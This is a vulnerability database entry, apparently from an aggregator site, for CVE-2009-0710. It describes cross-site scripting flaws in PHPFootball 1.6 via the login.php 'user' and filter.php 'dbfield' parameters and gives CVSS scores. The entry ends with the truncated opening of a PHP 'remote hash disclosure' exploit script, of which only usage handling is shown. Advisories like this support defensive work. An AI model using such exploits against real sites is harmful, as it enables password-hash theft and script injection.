4.3
CVSSv2

CVE-2009-0710

Published: 23/02/2009 Updated: 17/08/2017
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

Multiple cross-site scripting (XSS) vulnerabilities in PHPFootball 1.6 allow remote malicious users to inject arbitrary web script or HTML via (1) the user parameter to login.php or (2) the dbfield parameter to filter.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

vlad alexa mancini phpfootball 1.6

Exploits

<?php // garrdlsourceforgenet/sourceforge/phpfootball/PHPfootball16zip $host = $argv[1]; $path = $argv[2]; if ($argc != 3) { echo "PHPFootball <= 16 (filterphp) Remote Hash Disclosure Exploit\n"; echo "by KinG-LioN - eurohackersit\n"; echo "Usage: php {$argv[0]} <host> <path>\n"; exit; ...